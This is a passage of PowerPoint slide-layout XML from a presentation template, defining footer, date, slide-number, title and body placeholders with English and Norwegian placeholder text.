              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4465855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16020-DCB3-4BBC-BA41-B6B2ECEBEDA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59E865-451B-4A68-AB23-85191C8A909E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{597EA3D5-1D0A-4AAE-8C6C-3041C3DD67A5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5A95286-45E7-4F54-91A8-191BE4CD58E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B811E509-D2CE-4672-BCC0-ECA8BA8DFFB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BBFBB0B3-EBEB-4B48-A07D-AE47399A9A28}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40747701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C58A67-1D3D-4011-A7BE-ECCA4F4D7541}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8E0D923C-A005-43F3-BB99-6C67104DA11E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC41B258-A21F-414F-91A3-FA51689230C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0B0D6DB-A3ED-4360-B41A-31B2F2082ABC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BBFBB0B3-EBEB-4B48-A07D-AE47399A9A28}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4054036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543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/19/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6554697"/>
            <a:ext cx="5029200" cy="2286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E9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37083547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E863A-3133-4C91-B37C-488EEDE436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8BB3795-D59E-461E-99D6-D0AE7E7A07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1F2042-05D9-460B-9330-B18E1F6F6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493A19-4D08-438D-9CE3-1C17CE1102C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{29EB18E7-42CE-46B5-B3DE-43643BB4E0CC}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0836D3B7-2E2E-437F-90FB-BECCABB787E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E7B196D-ACE7-4151-AC06-C713B2F6EA66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BBFBB0B3-EBEB-4B48-A07D-AE47399A9A28}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24979592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F745-0833-4E7F-B058-3522F28B19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13F3B8-C59B-4D03-AE36-0C2382B490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EAF3837-6717-4CA6-B678-AA9E4D82EF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8B7DBA-461C-4B69-91A2-1BB715EFDB6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CE22ABF8-D40E-4899-B260-9C33CBDD01C3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3C7EE69-1985-4CCA-865C-A78238D6FF8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858415A-8B2D-4C05-820F-04181E249E86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BBFBB0B3-EBEB-4B48-A07D-AE47399A9A28}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22221362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D37EA-A4C3-4A0C-A0D9-34B4039FC3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0A7FEE-330C-4521-A9D1-A8552744FC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8B0602-D797-4C17-88AA-C45272A2BCE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{69383CA5-0CD6-441A-8FA8-F052AC5C4D80}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{748DD3BB-541D-41C6-A7E3-502866C255B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20C6715-C62A-40E8-9A7D-3E049A349D94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BBFBB0B3-EBEB-4B48-A07D-AE47399A9A28}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29336010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D1FEBF-D9A5-4137-B2CB-B7921FBF49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266CAD-66AA-475B-9DD5-08A76BD150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9570B3-C0D1-4FDD-AE46-504F6D417198}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{99348E4D-393C-405E-8840-DF7D2B79E082}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D49A9AEC-926F-4D7C-8DB2-7C379EB7F91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3D3EA4C9-B28B-44D5-96FA-9D9206CFAA12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BBFBB0B3-EBEB-4B48-A07D-AE47399A9A28}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1098694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4D4A9F7-26C5-4694-A296-7076D5CEB337}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720183" y="1587610"/>
            <a:ext cx="10749412" cy="4538931"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="75600" tIns="75600" rIns="75600" bIns="75600">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="265113" indent="-265113">
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="541338" indent="-276225">
              <a:defRPr/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Text – Tahoma 18pt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Espace réservé du titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4B0183-D6C8-4580-9610-C59C2EF430A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719137" y="739140"/>
            <a:ext cx="10751504" cy="546000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{330B3B81-CB18-49F2-A0E3-637EFF665D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252000" y="-384054"/>
            <a:ext cx="4080298" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" noProof="0"/>
              <a:t>Color of text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D86BF4AE-C967-4346-99C5-1B876420959E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-374907"/>
            <a:ext cx="252000" cy="252000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="494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97" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4061044470"/>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eks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4D4A9F7-26C5-4694-A296-7076D5CEB337}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720183" y="1587610"/>
            <a:ext cx="10749412" cy="4538931"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="75600" tIns="75600" rIns="75600" bIns="75600">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="265113" indent="-265113">
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="541338" indent="-276225">
              <a:defRPr/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Tekst – Tahoma 18pt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Andre nivå</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Espace réservé du titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4B0183-D6C8-4580-9610-C59C2EF430A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719137" y="739140"/>
            <a:ext cx="10751504" cy="546000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Tittel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{330B3B81-CB18-49F2-A0E3-637EFF665D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252000" y="-384054"/>
            <a:ext cx="4080298" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" noProof="0"/>
              <a:t>Farge på tekst</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D86BF4AE-C967-4346-99C5-1B876420959E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-374907"/>
            <a:ext cx="252000" cy="252000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="494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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3584614921"/>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ekst ikoner">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Espace réservé du titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4B0183-D6C8-4580-9610-C59C2EF430A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719137" y="739140"/>
            <a:ext cx="10751504" cy="546000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Tittel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FDEB22A-472A-4EFB-9D37-3E885FC98750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4753955" y="3897727"/>
            <a:ext cx="2702257" cy="1625290"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1800" b="0">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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BD8886C-CD28-4C7E-A1D0-02B60479DFB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343010" y="3897727"/>
            <a:ext cx="2702257" cy="1625290"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1800" b="0">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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F6531A9-C880-4BD2-88DC-96E543E74FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164899" y="3897727"/>
            <a:ext cx="2702257" cy="1625290"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx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nb-NO" noProof="0"/>
              <a:t>Tekst</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B63F56F-903A-4270-A9B5-96A8437CCCC0}"/>
              </a:ext>
            </a:extLst>
